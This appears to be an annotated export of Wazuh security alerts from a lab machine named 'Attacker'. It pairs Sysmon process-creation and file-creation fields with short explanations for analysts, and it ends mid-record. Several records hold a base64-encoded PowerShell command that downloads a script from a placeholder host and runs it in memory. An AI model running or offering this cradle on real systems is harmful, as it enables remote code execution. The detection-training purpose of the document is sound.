data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 48 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534237.1366120 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:15.3032370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283548 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:13.983
ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ProcessId: 14056
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ParentProcessId: 13184
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:13.983 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 52 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534238.1374191 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:15.8420160Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283558 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:15.808
ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ProcessId: 14056
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4aau3oor.h1p.ps1
CreationUtcTime: 2025-04-24 22:37:15.807
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:15.808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4aau3oor.h1p.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:15.807 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 49 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534239.1376960 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:17.2591799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283599 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:16.698
ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ProcessId: 13236
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ParentProcessId: 14056
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:16.698 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 53 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534240.1385031 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:17.5585591Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283600 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:17.547
ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ProcessId: 13236
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_r3nbxliw.do2.ps1
CreationUtcTime: 2025-04-24 22:37:17.547
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:17.547 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r3nbxliw.do2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:17.547 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 50 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534242.1387800 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:20.0085171Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283657 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:18.706
ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ProcessId: 14648
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
